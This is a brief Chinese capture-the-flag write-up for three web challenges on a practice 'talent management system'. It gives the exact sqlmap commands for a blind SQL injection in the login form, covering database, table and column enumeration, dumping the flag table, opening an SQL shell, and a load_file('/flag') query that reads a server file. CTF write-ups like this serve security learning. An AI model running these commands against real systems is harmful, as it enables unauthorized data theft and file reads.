人才(做的)管理系统 by hacked_1

查看源代码发现

img

登陆成功之后跳转

手动跳转一下 得到flag

人才(做的)管理系统 by hacked_2

注入点在登录界面的username

只能盲注

Sqlmap 启动

post注入 文件是sql5.txt

爆数据库:

python sqlmap.py -r "D:\Desktop\sql5.txt" -dbs

猜测flag在staff 接着爆表:

python sqlmap.py -r "D:\Desktop\sql5.txt" -D staff -tables

看到flag

继续

python sqlmap.py -r "D:\Desktop\sql4.txt" -D staff -T flag -columns

继续:

python sqlmap.py -r "D:\Desktop\sql4.txt" -D staff -T flag -C flag -dump

人才(做的)管理系统 by hacked_3

继续sqlmap梭

sqlmap.py -r "D:\Desktop\sql4.txt" --sql-shell

因为已知flag在根目录

直接利用load_file('/flag') 加载即可

select load_file('/flag')

最后出题人表示很赞...........